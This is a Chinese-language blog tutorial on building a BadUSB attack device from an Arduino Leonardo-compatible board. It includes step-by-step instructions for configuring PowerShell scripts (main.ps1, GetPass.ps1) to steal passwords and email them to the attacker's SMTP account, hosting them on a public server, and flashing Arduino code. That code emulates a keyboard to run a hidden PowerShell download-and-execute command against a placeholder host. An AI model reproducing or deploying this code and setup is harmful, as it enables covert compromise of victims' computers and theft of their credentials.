关注我们

Badusb黑客硬件烧写

LzersLzers 极客有趣 2019-10-28 11951 0

在文章开始之前我们先看看BadUSB内部构造

Badusb黑客硬件烧写


在接下来看看BadUSB HID的攻击原理以及优势

HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,本文要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。

而优势在于攻击者将恶意代码存放于Badusb的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件无法应对BadUSB的攻击。

BadUSB攻击流程

Bad-Usb插入后,会模拟键盘对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载恶意代码(通常为powershell脚本)并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。

Badusb黑客硬件烧写


本文中我们使用

软件:Arduino

硬件:BS Micro pro micro leonardo Arduino 开发板

硬件如图

Badusb黑客硬件烧写


需安装Teensyduino驱动

Badusb黑客硬件烧写


需要注意的是安装路径得同ardunio的安装路径

在正式开始烧写之前,我们需要下载BadUSB代码文件

Badusb黑客硬件烧写


就这玩意儿

修改main.ps1文件,如下图

Badusb黑客硬件烧写


将勾选部分xxx.xxx修改为自己域名

Badusb黑客硬件烧写


修改勾选部分

发信服务器如smtp.qq.com/smtp.163.com

邮箱账号/密码(授权码)

邮件标题如”BadUSB新鱼儿来啦“

邮件内容如“BadUSB获取结果”

Badusb黑客硬件烧写


修改GetPass.ps1文件前两行勾选部分为自己域名

Badusb黑客硬件烧写


同时修改第6行开始的发信配置,如main.ps1文件一样修改即可。此处不过多赘述

将修改后的全部文件用HFS上传到服务器(注意服务器需要外网访问,hfs网络文件服务器百度下载即可)

将硬件插入Usb接口并输入Windows +R 输入命令devmgmt.msc打开设备管理器
查看串口信息

Badusb黑客硬件烧写


打开Arduino IDE并根据以下路径  工具->版->选择“Arduino Leonardo”

Badusb黑客硬件烧写


port选择串口信息相符的

void setup(){
Keyboard.begin();
delay(5000);
Keyboard.press(KEY_LEFT_GUI);
delay(500);
Keyboard.press(‘r’);
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release(‘r’);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println(“CMD”);
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(3000);
Keyboard.println(“powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString(‘http://xx.xxx.xx/main.ps1’) “);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();
}
void loop() {}

将改代码烧写入硬件

xx.xxx.xx修改为自己的地址

然后就没了…

附件下载

大小 : 19.8 MB |  下载量 : 34 次 |  文件类型 : 压缩文件  

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址